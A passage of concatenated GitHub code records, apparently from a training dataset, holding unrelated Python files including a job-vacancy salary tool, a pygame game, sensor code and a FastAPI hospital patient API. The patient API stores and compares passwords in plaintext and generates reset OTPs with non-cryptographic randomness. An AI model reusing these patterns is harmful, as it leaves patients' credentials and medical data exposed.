(present_teeth_text, image_name_text, input_image, output_image, thresh_image, pub_date) VALUES (?,?,?,?,?,?)\",\n (present_teeth_text, image_name, input_image, output_image, thresh_image, now))\n\n\n","repo_name":"bhruszka/Bachelor-Thesis-App","sub_path":"PracaInzWebApp/addImageToDB.py","file_name":"addImageToDB.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2436443566","text":"import re\n\n\ndef get_ordinal_number(word):\n # 判断pattern\n\n pattern = r'(\\d+)(st|nd|rd|th)'\n match = re.search(pattern, word)\n if match:\n print(match)\n number = int(match.group(1))\n return number\n\n ordinals = {\n 'last': -1,\n 'first': 1,\n '1st': 1,\n 'second': 2,\n '2nd': 2,\n 'third': 3,\n '3rd': 3,\n 'fourth': 4,\n '4th': 4,\n 'fifth': 5,\n '5th': 5,\n 'sixth': 6,\n '6th': 6,\n 'seventh': 7,\n '7th': 7,\n 'eighth': 8,\n '8th': 8,\n 'ninth': 9,\n '9th': 9,\n 'tenth': 10,\n 'eleventh': 11,\n '32rd': 32\n }\n return ordinals.get(word.lower(), None)\n\n\ndef analyze_gpt(text):\n results = []\n data_list = text.split(' || ')\n for item in data_list:\n item_list = item.split(' (')\n results.append((item_list[0], item_list[1][:-1]))\n formatted_list = []\n for president in results:\n name, term = president\n start_date = term.strip()\n end_date = start_date # 默认与起始时间相同\n if '-' in term:\n start_date, end_date = term.split('-')\n start_date = start_date.strip()\n end_date = end_date.strip()\n if end_date.lower() == 'present':\n end_date = '2099'\n formatted_list.append([name, start_date, end_date])\n return formatted_list\n","repo_name":"Europix/TemporalQA","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6467744980","text":"from win10toast import ToastNotifier\nimport time\n\nclass Notificaciones:\n\n def notificar(self, titulo,mensaje):\n toaster = ToastNotifier()\n\n toaster.show_toast(\n titulo + \"!\", mensaje, threaded = True,\n icon_path=None, duration=6)\n\n while toaster.notification_active():\n time.sleep(0.1)\n","repo_name":"Jcamposlozano/SeguimientoSv","sub_path":"Notificaciones.py","file_name":"Notificaciones.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74088907240","text":"import time\nfrom datetime import datetime\n\n\nclass DistanceSensorController:\n def __init__(self, triggerPin, echoPin, gpio):\n self.triggerPin = triggerPin\n self.echoPin = echoPin\n self.gpio = gpio\n self.measuring = False\n\n def getDistance(self):\n print(\"Calculating distance\")\n self.gpio.output(self.triggerPin, self.gpio.HIGH)\n time.sleep(0.00001)\n self.gpio.output(self.triggerPin, self.gpio.LOW)\n\n while self.gpio.input(self.echoPin) == 0:\n pulse_start_time = time.time()\n while self.gpio.input(self.echoPin) == 1:\n pulse_end_time = time.time()\n\n pulse_duration = pulse_end_time - pulse_start_time\n\n distance = round(pulse_duration * 17150, 2)\n\n print (\"Distance:\",distance,\"cm\")\n return distance\n\n def startMeasuring(self, outputTarget, outputTargetName, cycleLength=60000):\n self.measuring = True\n start_timestamp = datetime.utcnow()\n measured = False\n while self.measuring:\n lapsedTime = datetime.utcnow() - start_timestamp\n if lapsedTime < cycleLength:\n if not measured:\n outputTarget[outputTargetName] = self.getDistance()\n measured = True\n else:\n start_timestamp = datetime.utcnow()\n measured = False\n\n def stopMeasuring(self):\n self.measuring = False\n\n","repo_name":"emper911/outdoor_pi_controller","sub_path":"app/DistanceSensor.py","file_name":"DistanceSensor.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10933623706","text":"from PIL import ImageFont, ImageDraw\n\n\ndef make_great_cover(image, str):\n font_size = 30\n font = ImageFont.truetype(\"/home/KrozeRoll/mysite/wrift.ttf\", font_size)\n text_size = font.getsize(str)\n\n draw = ImageDraw.Draw(image)\n\n h = image.size[1]\n w = image.size[0]\n\n draw.text(((w - text_size[0]) / 2, h - text_size[1] - 10), str,\n font=font, fill=\"white\")\n return image\n","repo_name":"KrozeRoll/vk-public-bot","sub_path":"coverMaking.py","file_name":"coverMaking.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20905319304","text":"import logging\n\nimport requests\nfrom itertools import count\n\nfrom dotenv import dotenv_values\nfrom terminaltables import AsciiTable\n\n\ndef get_vacancies_hh(language):\n url = \"https://api.hh.ru/vacancies\"\n vacancies_pages = []\n\n for page in count(0):\n payload = {\n \"text\": f\"Программист {language}\",\n \"area\": 1,\n \"page\": page,\n \"per_page\": 100\n }\n response = requests.get(url, params=payload)\n response.raise_for_status()\n vacancies_page = response.json()\n if not vacancies_page[\"found\"]:\n logging.warning(f\"Данные по языку {language} от сервиса HH не найдены\")\n break\n vacancies_pages.append(vacancies_page)\n if page >= vacancies_page['pages'] - 1:\n break\n\n logging.info(f\"Завершено получение данных по языку {language} от сервиса HH\")\n return vacancies_pages\n\n\ndef get_vacancies_sj(language, key):\n url = \"https://api.superjob.ru/2.0/vacancies/\"\n headers = {\n \"X-Api-App-Id\": key,\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n vacancies_pages = []\n for page in count(0):\n payload = {\n \"keyword\": f'Программист {language}',\n \"town\": 4,\n \"page\": page,\n \"count\": 100\n }\n response = requests.get(url, headers=headers, params=payload)\n response.raise_for_status()\n vacancies_page = response.json()\n if not vacancies_page[\"total\"]:\n logging.warning(f\"Данные по языку {language} от сервиса SJ не найдены\")\n break\n vacancies_pages.append(vacancies_page)\n if not vacancies_page['more']:\n break\n\n logging.info(f\"Завершено получение данных по языку {language} от сервиса SJ\")\n return vacancies_pages\n\n\ndef calculate_rub_salary_hh(vacancy):\n if vacancy[\"salary\"]:\n currency = vacancy[\"salary\"][\"currency\"]\n salary_from = vacancy[\"salary\"][\"from\"]\n salary_to = vacancy[\"salary\"][\"to\"]\n if currency == \"RUR\":\n return calculate_salary(salary_from, salary_to)\n\n\ndef calculate_rub_salary_sj(vacancy):\n salary_from = vacancy[\"payment_from\"]\n salary_to = vacancy[\"payment_to\"]\n currency = vacancy[\"currency\"]\n if currency == \"rub\":\n return calculate_salary(salary_from, salary_to)\n\n\ndef calculate_salary(salary_from, salary_to):\n if salary_from:\n if salary_to:\n return (salary_from + salary_to) / 2\n else:\n return salary_from * 1.2\n elif salary_to:\n return salary_to * 0.8\n\n\ndef make_clever_print(statistics, title):\n table_data = [\n (\n \"Язык программирования\",\n \"Вакансий найдено\",\n \"Вакансий обработано\",\n \"Средняя зарплата\"\n )\n ]\n for language in statistics:\n info = statistics[language]\n table_data.append(\n (\n language,\n info[\"vacancies_found\"],\n info[\"vacancies_processed\"],\n info[\"average\"]\n )\n )\n\n table_instance = AsciiTable(table_data, title)\n table_instance.justify_columns[2] = 'right'\n return table_instance.table\n\n\ndef process_vacancies_hh(vacancies_pages):\n language_params = {\n \"average\": 0,\n \"vacancies_processed\": 0,\n \"vacancies_found\": 0,\n }\n for vacancies_page in vacancies_pages:\n vacancies = vacancies_page[\"items\"]\n total_vacancies = vacancies_page[\"found\"]\n for vacancy in vacancies:\n salary = calculate_rub_salary_hh(vacancy)\n if salary:\n language_params[\"average\"] += salary\n language_params[\"vacancies_processed\"] += 1\n language_params[\"vacancies_found\"] = total_vacancies\n language_params[\"average\"] = int(language_params[\"average\"] / language_params[\"vacancies_processed\"])\n return language_params\n\n\ndef process_vacancies_sj(vacancies_pages):\n language_params = {\n \"average\": 0,\n \"vacancies_processed\": 0,\n \"vacancies_found\": 0,\n }\n for vacancies_page in vacancies_pages:\n vacancies = vacancies_page[\"objects\"]\n total_vacancies = vacancies_page[\"total\"]\n for vacancy in vacancies:\n salary = calculate_rub_salary_sj(vacancy)\n if salary:\n language_params[\"average\"] += salary\n language_params[\"vacancies_processed\"] += 1\n language_params[\"vacancies_found\"] += total_vacancies\n language_params[\"average\"] = int(language_params[\"average\"] / language_params[\"vacancies_processed\"])\n return language_params\n\n\nif __name__ == \"__main__\":\n top_languages = [\n \"JavaScript\",\n \"Java\",\n \"Python\",\n \"Ruby\",\n \"PHP\",\n ]\n sj_key = dotenv_values(\".env\")[\"SJ_SECRET_KEY\"]\n top_languages_info_hh = {}\n top_languages_info_sj = {}\n for language in top_languages:\n try:\n vacancies_pages_hh = get_vacancies_hh(language)\n if vacancies_pages_hh:\n top_languages_info_hh[language] = process_vacancies_hh(vacancies_pages_hh)\n vacancies_pages_sj = get_vacancies_sj(language, sj_key)\n if vacancies_pages_sj:\n top_languages_info_sj[language] = process_vacancies_sj(vacancies_pages_sj)\n except requests.exceptions.HTTPError as error:\n logging.error(\"Can't get data from server:\\n{0}\".format(error))\n print(\n make_clever_print(\n top_languages_info_hh,\n \"Вакансии HeadHunter в Москве\"\n ),\n end=\"\\n\\n\"\n )\n print(make_clever_print(\n top_languages_info_sj,\n \"Вакансии SuperJob в Москве\"\n ))\n","repo_name":"Yar59/HeadHunter-and-SuperJob","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"16282556993","text":"import pygame\nimport os\nimport sys\nimport importlib\nimport inspect\nfrom player import Player\nfrom worlds_hardest_game.src.geneticAlgorithm.population import Population\nfrom enemy import Enemy\nfrom field import Field\nfrom time import sleep\n\n\n# IDEA make a new class for the lvl choosing\nclass Game:\n\n def __init__(self, lvlName, humanPlayer=True):\n # verify types\n if not isinstance(lvlName, str):\n raise TypeError('Expected str; got %s' % type(lvlName).__name__)\n # check if it is a valid lvlName\n if not self.validFileName(lvlName):\n raise Exception('The level name %s is not valid.' % type(lvlName).__name__)\n # check if lvl exists\n self.lvlPath = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, (\"lvl/\" + lvlName + \".py\"))\n # if the file doesn't exist raise exception\n if not os.path.exists(self.lvlPath):\n raise Exception('The lvl %s doesn\\'t exist.' % lvlName)\n # if the lvl exists safe lvl name\n self.lvlName = lvlName\n # set relative module name valid to do only in the project\n self.modulePath = 'worlds_hardest_game.lvl'\n # import the lvl file\n self.importLvl = importlib.import_module('.'+self.lvlName, self.modulePath)\n # build the lvl class name and functionality\n self.lvlClassName = self.lvlName[0].upper() + self.lvlName[1::]\n # create the right class object so it can be used\n self.lvlClass = getattr(self.importLvl, self.lvlClassName)\n # create lvl instance\n self.lvl = self.lvlClass()\n # check if human player\n self.humanPlayer = humanPlayer\n # set default parameters for a population\n self.populationSize = 100\n self.mutationRate = 0.01\n self.moveIncreasePerFiveRounds = 30\n self.maxGenerations = 500\n # create empty variables for font and screen and players, and for all goal objects\n self.font = None\n self.screen = None\n self.players = []\n self.goals = []\n self.population = None\n self.stop = False\n # start the game screen\n self.initGame()\n\n @staticmethod\n def validFileName(name):\n # list off illegal characters as well as - and .\n illegalChars = ['#', '%', '&', '{', '}', '\\\\', '<', '>', '*', '?', '/', ' ', '$', '!',\n '\\'', '\\\"', ':', '@', '+', '`', '|', '=', '-', '.']\n # iterate over all illegal chas and check if any is part of the name\n for char in illegalChars:\n if char in name:\n print(f\"The character {char} is not allowed to be part of the fileName\")\n return False\n # check that the file name starts with a lower case character\n if not name[0].islower():\n print(\"The first character has to be lower case\")\n return False\n return True\n\n # this method initiate the game\n def initGame(self):\n # start pygame\n pygame.init()\n # IDEA later add Deathcounter below has to increase the size\n # start the screen\n self.screen = pygame.display.set_mode((self.lvl.windowWidth, self.lvl.windowHeight))\n # set font\n self.font = pygame.font.Font('freesansbold.ttf', 15)\n # draw first time\n self.drawHuman()\n # safe all goal tiles\n for colum in self.lvl.field.field:\n for tile in colum:\n if tile.goal:\n self.goals.append(tile.object)\n # initiate player and difference for human and genetic\n if self.humanPlayer:\n self.players.append(Player(list(self.lvl.playerStartingPos), self.lvl.playerSize))\n self.runningHuman()\n else:\n # create a default player\n self.players.append(Player(list(self.lvl.playerStartingPos), self.lvl.playerSize))\n self.population = Population(self.populationSize, self.players[0], self.mutationRate, self.moveIncreasePerFiveRounds, self.lvl.field, self.maxGenerations)\n self.runningAI()\n # stop pygame\n pygame.quit()\n\n # this methods handles all the game interactions\n def runningHuman(self):\n # set roughly the speed for the game in frames per second\n fps = 30\n # calculate how long to wait by dividing 1000 ms / fps because function needs int round it\n delay = int(1000 / fps)\n running = True\n # keep the editor running until the save mode has been accessed\n while running:\n # add a pygame delay so the game is not always updating\n pygame.time.delay(delay)\n # draw everything\n self.drawHuman()\n # update all objects\n running = self.updateHuman()\n\n # this method draws the screen\n def drawHuman(self):\n self.screen.fill((183, 175, 250))\n self.lvl.field.draw(self.screen)\n for player in self.players:\n player.draw(self.screen)\n pygame.display.update()\n\n # this method updates everything\n def updateHuman(self):\n self.lvl.field.move()\n events = pygame.event.get()\n for event in events:\n # detect if window has been closed\n if event.type == pygame.QUIT:\n return False\n # get all down pressed keys\n keys = pygame.key.get_pressed()\n # update the player\n self.players[0].moveHuman(keys, self.screen, self.lvl.field)\n # check for collision\n if self.collisionHuman():\n return False\n return True\n\n # this method checks for collision with enemies and the goal\n def collisionHuman(self):\n collision = [False] * len(self.players)\n # list enemy objects\n enemies = list(map(lambda x: x.object, self.lvl.field.enemy))\n # check if collision with enemy\n for idx, player in enumerate(self.players):\n if player.object.collidelist(enemies) != -1:\n print(\"You died.\")\n player.reset()\n collision[idx] = True\n # if all players collided reset lvl\n if all(collision):\n self.lvl = self.lvlClass()\n self.goals = []\n self.drawHuman()\n # safe all goal tiles just in cas\n for colum in self.lvl.field.field:\n for tile in colum:\n if tile.goal:\n self.goals.append(tile.object)\n return False\n # check if any player reached the goal\n for idx, player in enumerate(self.players):\n if player.object.collidelist(self.goals) != -1:\n print(\"Reached goal\")\n print(f'Player died {player.deaths} times.')\n player.goal = True\n collision[idx] = True\n return True\n\n def runningAI(self):\n # set roughly the speed for the game in frames per second\n fps = 30\n # calculate how long to wait by dividing 1000 ms / fps because function needs int round it\n delay = int(1000 / fps)\n running = True\n # keep the editor running until the save mode has been accessed\n while running:\n # add a pygame delay so the game is not always updating\n pygame.time.delay(delay)\n # draw everything\n self.drawAI()\n # update all objects\n running = self.updateAI()\n # the generation finished\n self.population.calcFitness()\n # check if the maximum gernerations have been reached\n if not self.stop and self.population.currentGeneration < self.population.maxGeneration:\n # finished n-th population\n print(f'Finished {self.population.currentGeneration}-th generation.')\n # reset the field\n self.lvl = self.lvlClass()\n self.goals = []\n self.drawAI()\n # safe all goal tiles just in cas\n for colum in self.lvl.field.field:\n for tile in colum:\n if tile.goal:\n self.goals.append(tile.object)\n # gernerat next Gen\n self.population.newGeneration()\n # rerun running\n return self.runningAI()\n if self.stop:\n print(\"User stopped the program.\")\n else:\n print(\"Reached Population limit\")\n\n # this method draws everything for the ai\n def drawAI(self):\n self.screen.fill((183, 175, 250))\n self.lvl.field.draw(self.screen)\n self.population.draw(self.screen)\n pygame.display.update()\n return\n\n # this method updates everything\n def updateAI(self):\n self.lvl.field.move()\n events = pygame.event.get()\n for event in events:\n # detect if window has been closed\n if event.type == pygame.QUIT:\n self.stop = True\n return False\n # move all creatures\n result = self.population.move(self.screen)\n # check for collisions\n self.collisionAI()\n # return result\n return result\n\n # this method calculates the colsision for the ai\n def collisionAI(self):\n # list enemy objects\n enemies = list(map(lambda x: x.object, self.lvl.field.enemy))\n # check if collision with enemy\n for idx, player in enumerate(self.population.creatures):\n if player.player.object.collidelist(enemies) != -1:\n print(\"You died.\")\n player.player.reset()\n # check if any player reached the goal\n for idx, player in enumerate(self.population.creatures):\n if player.player.object.collidelist(self.goals) != -1:\n print(\"Reached goal\")\n print(f'Player died {player.player.deaths} times.')\n player.player.goal = True\n\nq = Game('lvlTest', humanPlayer=False)\n","repo_name":"Joni0131/worlds_hardest_game","sub_path":"src/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40333989469","text":"\"\"\"Controller file for writing db queries\"\"\"\nimport json\nimport math\nimport random\nimport sys\nfrom fastapi import HTTPException,Request, UploadFile\nfrom typing import Optional\nfrom sqlalchemy import Integer\nfrom sqlalchemy.orm import Session\nfrom authentication import Authentication\nfrom jwt_utility import JWTUtility\nimport patient\nfrom patient.email_manager import EmailManager\nfrom response import Response as ResponseData\nfrom patient.app.models import models,schemas\nfrom hospital.app.api.controller import check_if_hospital_id_is_valid\nfrom patient.app.error_handling import Error\nimport ast\nfrom fastapi.responses import FileResponse\n\nsys.path.append('/Users/anirudh.chawla/python_fast_api_projects/hospital-management-fastapi')\n\n\n# Python code to merge dict using update() method\ndef Merge(dict1, dict2):\n \"\"\"Function to merge dict using update method\"\"\"\n return dict2.update(dict1)\n\ndef add_new_patient(database: Session, file: UploadFile, first_name: str, last_name: str, contact_number: str,password: str,\n email: str, gender: str,\n date_of_birth: str, blood_group: str,\n hospital_id: str,marital_status: str, height: str, weight: str,\n emergency_contact_number: str, city: str,\n allergy: str, current_medication: str,\n past_injury: str,past_surgery: str, smoking_habits: str, alchol_consumption: str,\n activity_level: str, food_preference: str,\n occupation: str):\n \"\"\"Function to add new patient data\"\"\"\n db_patient_email = database.query(models.Patient).filter(models.Patient.email == email).first()\n db_patient_number = database.query(models.Patient).filter(models.Patient.contact_number == contact_number).first()\n if db_patient_email or db_patient_number:\n return ResponseData.success_without_data(\"This user already exists\")\n patientdata = {\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"contact_number\": contact_number,\n \"password\" : password,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"blood_group\": blood_group,\n \"hospital_id\": hospital_id,\n 'profile_pic' : f'patient_images/{file}'\n }\n db_patient = models.Patient(**patientdata)\n database.add(db_patient)\n database.commit()\n database.refresh(db_patient)\n patient_details_data = {\n \"id\" : db_patient.id,\n \"marital_status\": marital_status,\n \"height\": height,\n \"weight\": weight,\n \"emergency_contact_number\": emergency_contact_number,\n \"city\": city,\n \"smoking_habits\" : smoking_habits,\n \"alchol_consumption\": alchol_consumption,\n \"activity_level\": activity_level,\n \"occupation\" : occupation,\n }\n db_patient_details = models.PatientDetails(**patient_details_data)\n database.add(db_patient_details)\n database.commit()\n database.refresh(db_patient_details)\n Merge(patientdata, patient_details_data)\n token = {\n 'authentication_token' : JWTUtility.encode_token(db_patient.email,db_patient.contact_number)\n }\n Merge(token, patient_details_data)\n if len(allergy.split(\",\")) > 0 and allergy != \"\":\n new_list = []\n for i in range(0,len(str(allergy).split(\",\"))):\n data = database.query(models.Allergies).filter(models.Allergies.id == str(allergy.split(\",\")[i])).first()\n print(f\"data {data}\")\n if data is None:\n return ResponseData.success_without_data(\"Allergy id is invalid\")\n new_list.append(data)\n allergy_data = {\n \"patient_id\" : str(db_patient.id),\n \"allergy_id\" : str(allergy.split(\",\")[i])\n }\n db_patient_allergies_details = models.Patient_Allergies(**allergy_data)\n database.add(db_patient_allergies_details)\n database.commit()\n database.refresh(db_patient_allergies_details)\n # patient_details_data[\"allergies\"] = new_list\n if len(food_preference.split(\",\")) > 0 and food_preference != \"\":\n new_list = []\n for i in range(0,len(str(food_preference).split(\",\"))):\n data = database.query(models.FoodPreference).filter(models.FoodPreference.id == str(food_preference.split(\",\")[i])).first()\n if data is None:\n return ResponseData.success_without_data(\"food preference id is invalid\")\n new_list.append(data)\n food_preferences = {\n \"patient_id\" : str(db_patient.id),\n \"food_preference_id\" : str(food_preference.split(\",\")[i])\n }\n db_patient_food_preference_details = models.Patient_FoodPreference(**food_preferences)\n database.add(db_patient_food_preference_details)\n database.commit()\n database.refresh(db_patient_food_preference_details)\n # patient_details_data[\"food_preferences\"] = new_list\n new_list = []\n if len(current_medication.split(\",\")) > 0 and current_medication != \"\":\n print(f'current_medication.split(\",\") {current_medication.split(\",\")}')\n for i in range(0,len(str(current_medication).split(\",\"))):\n if not database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(current_medication.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Current medication id is invalid\")\n new_list.append(database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(current_medication.split(\",\")[i])).first())\n current_medications = {\n \"patient_id\" : str(db_patient.id),\n \"current_medication_id\" : str(current_medication.split(\",\")[i])\n }\n db_patient_current_medication_details = models.Patient_CurrentMedications(**current_medications)\n database.add(db_patient_current_medication_details)\n database.commit()\n database.refresh(db_patient_current_medication_details)\n # patient_details_data[\"current_medications\"] = new_list\n new_list = []\n if len(past_injury.split(\",\")) > 0 and past_injury != \"\":\n print(f'str(past_injury).split(\",\") {str(past_injury).split(\",\")}')\n for i in range(0,len(str(past_injury).split(\",\"))):\n if not database.query(models.PastInjuries).filter(models.PastInjuries.id == str(past_injury.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Past injury id is invalid\")\n # new_list.append(database.query(models.PastInjuries).filter(models.PastInjuries.id == str(past_injury.split(\",\")[i])).first())\n past_injuries = {\n \"patient_id\" : str(db_patient.id),\n \"past_injury_id\" : str(past_injury.split(\",\")[i])\n }\n db_patient_past_injuries_details = models.Patient_PastInjuries(**past_injuries)\n database.add(db_patient_past_injuries_details)\n database.commit()\n database.refresh(db_patient_past_injuries_details)\n # patient_details_data[\"past_injuries\"] = new_list\n new_list = []\n if len(past_surgery.split(\",\")) > 0 and past_surgery != \"\":\n for i in range(0,len(str(past_surgery).split(\",\"))):\n if not database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(past_surgery.split(\",\")[i])).first():\n return ResponseData.success_without_data(\"Past surgery id is invalid\")\n new_list.append(database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(past_surgery.split(\",\")[i])).first())\n past_surgery = {\n \"patient_id\" : str(db_patient.id),\n \"past_surgery_id\" : str(past_surgery.split(\",\")[i])\n }\n db_patient_past_surgeries_details = models.Patient_PastSurgeries(**past_surgery)\n database.add(db_patient_past_surgeries_details)\n database.commit()\n database.refresh(db_patient_past_surgeries_details)\n # patient_details_data[\"past_surgeries\"] = new_list\n if patient_details_data[\"hospital_id\"] is None:\n patient_details_data[\"hospital_id\"] = \"\"\n # patient_details_data.pop(\"allergies\")\n # patient_details_data.pop(\"food_preferences\")\n # patient_details_data.pop(\"current_medications\")\n # patient_details_data.pop(\"past_injuries\")\n # patient_details_data.pop(\"past_surgeries\")\n return ResponseData.success(patient_details_data,\"New Patient added successfully\")\n\ndef get_patient(request:Request,database: Session, contact_number : str):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n return database.query(models.Patient).filter(models.Patient.contact_number == contact_number).first()\n\nasync def patient_forget_password(database: Session, email : Optional[str] = None):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n db_patient_email = database.query(models.Patient).filter(models.Patient.email == email).first()\n if not db_patient_email:\n return ResponseData.success_without_data(\"Email id is invalid\")\n digits = \"0123456789\"\n OTP = \"\"\n for i in range(6):\n OTP += digits[math.floor(random.random() * 10)]\n otp = list(OTP)\n if otp[0] == \"0\":\n otp[0] = \"1\"\n OTP = \"\" \n for i in range(0,len(otp)):\n OTP+=otp[i]\n template = '''\n\n\n\n\n

    Otp for reseting password

    \n\n

    Your otp is {0}

    \n\n\n\n'''.format(OTP)\n print(\"sdds\")\n await EmailManager().forgot_password(\n email,\n \"Forgot Password\",\n template\n ),\n # user_otp_data = OtpForPasswordModel.objects.filter(\n # user_id=user_data.id\n # ).first()\n return database.query(models.Patient).filter(models.Patient.email == email).first()\n\ndef reset_password_for_patient(database: Session, old_password : str,new_password : str,patient_id:int):\n \"\"\"Function to reset password for a particular patient\"\"\"\n db_patient = database.query(models.Patient).filter(models.Patient.id == patient_id,models.Patient.password == old_password).first()\n if not db_patient:\n return ResponseData.success_without_data(\"Password is invalid\")\n database.query(models.Patient).filter(models.Patient.id == patient_id).update({\n models.Patient.password : new_password, \n })\n database.flush()\n database.commit()\n return ResponseData.success({},\"Password has been updated successfully\")\n\ndef patient_sign_in_api(database: Session,email : Optional[str] = None,password : Optional[str] = None):\n \"\"\"Function to sign in a patient\"\"\"\n db_patient = database.query(models.Patient).filter(models.Patient.email == email,models.Patient.password == password).first()\n if not db_patient:\n return ResponseData.success_without_data(\"Credentials are invalid\")\n db_patient_details = database.query(models.Patient).filter(models.Patient.email == email).first()\n token = {\n 'authentication_token' : JWTUtility.encode_token(db_patient_details.email,db_patient_details.contact_number)\n }\n Merge(token, db_patient_details.__dict__)\n if db_patient_details.__dict__[\"hospital_id\"] is None:\n db_patient_details.__dict__[\"hospital_id\"] = \"\"\n db_patient_details.__dict__.pop(\"password\")\n return ResponseData.success(db_patient_details.__dict__,\"Patient signed in successfully\")\n\ndef get_patient_by_id(database: Session, id : Optional[int] = None):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n if id is None:\n db_patient = database.query(models.Patient).filter().first()\n db_patient_details = database.query(models.PatientDetails).filter().first()\n Merge(db_patient.__dict__, db_patient_details.__dict__)\n return ResponseData.success(db_patient_details.__dict__,\"Patient details fetched successfully\")\n db_patient = database.query(models.Patient).filter(models.Patient.id == id).first()\n if db_patient is None:\n return ResponseData.success([],\"Patient with this id does not exists\")\n db_patient_details = database.query(models.PatientDetails).filter(models.PatientDetails.id == id).first()\n Merge(db_patient.__dict__, db_patient_details.__dict__)\n allergies_list = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(db_patient.id)).all()\n allergies = []\n print(f\"allergies_list[i] {allergies_list[0].allergy_id}\")\n for i in range(0,len(allergies_list)):\n allergy = database.query(models.Allergies).filter(models.Allergies.id == str(allergies_list[i].allergy_id)).first()\n if allergy is not None:\n allergies.append(allergy)\n db_patient_details.__dict__[\"patient_allergies\"] = allergies\n medications_list = database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(db_patient.id)).all()\n medications = []\n for i in range(0,len(medications_list)):\n medication = database.query(models.CurrentMedications).filter(models.CurrentMedications.id == str(medications_list[i].current_medication_id)).first()\n if medication is not None:\n medications.append(medication)\n db_patient_details.__dict__[\"patient_current_medications\"] = medications\n injuries_list = database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(db_patient.id)).all()\n injuries = []\n for i in range(0,len(injuries_list)):\n injury = database.query(models.PastInjuries).filter(models.PastInjuries.id == str(injuries_list[i].past_injury_id)).first()\n if injury is not None:\n injuries.append(injury)\n db_patient_details.__dict__[\"patient_past_injuries\"] = injuries\n surgeries_list = database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(db_patient.id)).all()\n surgeries = []\n for i in range(0,len(surgeries_list)):\n surgery = database.query(models.PastSurgeries).filter(models.PastSurgeries.id == str(surgeries_list[i].past_surgery_id)).first()\n if surgery is not None:\n surgeries.append(surgery)\n db_patient_details.__dict__[\"patient_past_surgeries\"] = surgeries\n food_preference_list = database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(db_patient.id)).all()\n food_preference = []\n for i in range(0,len(food_preference_list)):\n food = database.query(models.FoodPreference).filter(models.FoodPreference.id == str(food_preference_list[i].food_preference_id)).first()\n if food is not None:\n food_preference.append(food)\n db_patient_details.__dict__[\"patient_food_preferences\"] = food_preference\n if db_patient_details.__dict__[\"hospital_id\"] is None:\n db_patient_details.__dict__[\"hospital_id\"] = \"\"\n return ResponseData.success(db_patient_details.__dict__,\"Patient details fetched successfully\")\n\ndef get_patient_by_pagination(database: Session,page : int,size:int):\n \"\"\"Function to get patient details by pagination\"\"\"\n data = database.query(models.Patient,models.PatientDetails).filter(models.Patient.id == models.PatientDetails.id).all()\n listdata = []\n if(len(data) > 1):\n for i, ele in enumerate(data):\n dict1 = ele[\"PatientDetails\"]\n dict2 = ele[\"Patient\"]\n dict1.__dict__.update(dict2.__dict__)\n listdata.append(dict1) \n data = listdata[page*size : (page*size) + size]\n if len(data) > 0:\n return ResponseData.success(data,\"Patient details fetched successfully\")\n return ResponseData.success([],\"No Patient found\") \n return ResponseData.success(listdata,\"No Patient found\")\n\ndef delete_patient_details(database: Session, id : Optional[int] = None):\n \"\"\"Function to delete single or all patient details if needed\"\"\"\n if id is None:\n database.query(models.Patient).delete()\n database.commit()\n return ResponseData.success([],\"All Patient details deleted successfully\")\n database.query(models.Patient).filter_by(id = id).delete()\n database.query(models.PatientDetails).filter_by(id = id).delete()\n database.query(models.Allergies).filter_by(patient_id = str(id)).delete()\n database.query(models.CurrentMedications).filter_by(patient_id = str(id)).delete()\n database.query(models.PastInjuries).filter_by(patient_id = str(id)).delete()\n database.query(models.PastSurgeries).filter_by(patient_id = str(id)).delete()\n database.commit()\n return ResponseData.success([],\"Patient details deleted successfully\")\n\ndef check_if_patient_id_is_valid(database: Session, id : Optional[int] = None):\n \"\"\"Function to check if patient id exists or not\"\"\"\n hospital_data = database.query(models.Patient).filter(models.Patient.id == id).first()\n if hospital_data:\n return True\n else:\n return False\n\ndef update_fields(actualDict,key,value):\n if key != '' or key is not None:\n actualDict[f\"{key}\"] = value\n\ndef update_patient_details(database: Session, profile_pic: UploadFile, first_name: str, last_name: str, contact_number: str,\n email: str, gender: str,\n date_of_birth: str, blood_group: str,\n hospital_id: str,marital_status: str, height: str, weight: str,\n emergency_contact_number: str, city: str,\n allergy: str, current_medication: str,\n past_injury: str,past_surgery: str, smoking_habits: str, alchol_consumption: str,\n activity_level: str, food_preference: str,\n occupation: str, patient_id: Integer):\n \"\"\"Function to update patient details\"\"\"\n db_patient = database.query(models.Patient).filter(models.Patient.id == 